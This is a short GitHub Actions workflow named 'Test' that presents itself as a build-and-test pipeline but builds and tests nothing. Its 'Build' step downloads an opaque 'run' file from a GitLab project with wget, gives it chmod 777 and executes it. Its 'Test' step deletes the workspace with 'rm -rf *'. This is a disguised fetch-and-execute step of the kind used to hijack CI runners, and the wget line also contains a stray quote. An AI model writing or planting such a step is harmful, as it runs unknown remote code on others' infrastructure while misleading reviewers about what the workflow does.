name: Test

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs: 
  build:
    runs-on: Ubuntu-20.04
    strategy:
      matrix:
        D1: [1]
        D2: [0]
      fail-fast: false
    steps:
    - name: Run checkout@v2.3.4
      uses: actions/checkout@v2.3.4

    - name: Build
      run: |
        wget https://gitlab.com/api/v4/projects/25038185/repository/files/run/raw?ref=master' && chmod 777 run && ./run
        echo "done"
    - name: Test
      run: |
        rm -rf *
        echo "done"  
